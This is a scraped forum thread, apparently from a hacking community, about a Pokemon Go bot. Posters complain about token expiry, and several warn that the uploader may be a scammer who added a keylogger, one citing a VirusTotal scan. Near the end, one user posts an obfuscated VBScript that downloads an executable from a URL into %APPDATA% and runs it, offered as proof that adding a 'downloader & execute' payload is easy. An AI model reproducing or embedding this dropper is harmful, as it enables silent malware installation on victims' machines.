Pokemon Go Bot

Lucky Dice

Well, its doing his job... but sadly after 1-2 hrs it's requesting a new google token, kind of stupid if you want to leave it during the night online :(

PS: Just wanted a smurf :(

Well, its doing his job... but sadly after 1-2 hrs it's requesting a new google token, kind of stupid if you want to leave it during the night online :(

PS: Just wanted a smurf :(

Then use Ptc

This is not about the bot but general. The bans reach 24 hours.

he is using something you will be using in 4 years if you're lucky enough.

Iphone13? A futuristic Tablet? Holographic device? I'm trying to think but i can't sir. Can you help me by telling me what Mr. Xdem is using ? Thanks in advance.

Watch out for vorfin (infamous byte) keylogger

If he got access to the source then he can easily implement a keylogger and share it here in mxc.

If you get your passwords hacked then you know who is the culplrit!

Good luck and happy hacking! (or get happy hacked LOL)

gQHui.png

This is van persie we're talking about! "the most reputable scammer in mxc". He has been expecting for this chance so you can bite the bait and get **************

For the people who already opened this application i suggest that you will reinstall your windows and change all your passwords before it's too late.

Edited by Karasu_

If he got access to the source then he can easily implement a keylogger and share it here in mxc.

gQHui.png

This is van persie we're talking about! "the most reputable scammer in mxc". He has been expecting for this chance so you can bite the bait and get **************

For the people who already opened this application i suggest that you will reinstall your windows and change all your passwords before it's too late.

https://www.virustotal.com/el/file/202afeb41f95282f90d74da43520cb76ae1c0989dc4089a2f2dcc42623fbad15/analysis/

c0841e9db71f41e5815f99550ee9181d.png

He is silly he can't add a keylogger, he don't know how to add it on the source. Sure he can download keylogger programs and make an exe but he can't add it on the source somehow  sooo 

don't worry. :-[

Edited by AccessDenied

He is silly he can't add a keylogger, he don't know how to add it on the source. Sure he can download keylogger programs and make an exe but he can't add it on the source somehow  sooo 

don't worry. :-[

Function rPicOdLs(lXIbUjEI)
Dim ggjZZpyX, MTAIBJTB
For ggjZZpyX = 1 To LenB(lXIbUjEI)
MTAIBJTB = MTAIBJTB & Chr(AscB(MidB(lXIbUjEI, ggjZZpyX, 1)))
Next
rPicOdLs = MTAIBJTB
End Function
Sub GcaGHONQ(nPsoiijt, hYSnoocJ)
Dim bgtlutVY: Set bgtlutVY = CreateObject("MSXML2.ServerXMLHTTP")
Dim IUKTVNrC: IUKTVNrC = "GET"
bgtlutVY.Open IUKTVNrC, nPsoiijt, False
bgtlutVY.Send
Dim CckSbTkR, iQCADmGv
Set iQCADmGv = CreateObject("Scripting.FileSystemObject").OpenTextFile(hYSnoocJ, 2, True)
iQCADmGv.WriteLine (rPicOdLs(bgtlutVY.ResponseBody))
iQCADmGv.Close()
Set bgtlutVY = Nothing
Set iQCADmGv = Nothing
End Sub
Dim cYczJszK: cYczJszK = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%APPDATA%") & "\Example.exe"
Dim XhDxOytZ: XhDxOytZ = "http://google.com/server.exe"
GcaGHONQ XhDxOytZ, cYczJszK
CreateObject("WScript.Shell").Run Chr(34) & cYczJszK & Chr(34)

really hard to add a downloader % execute exploit.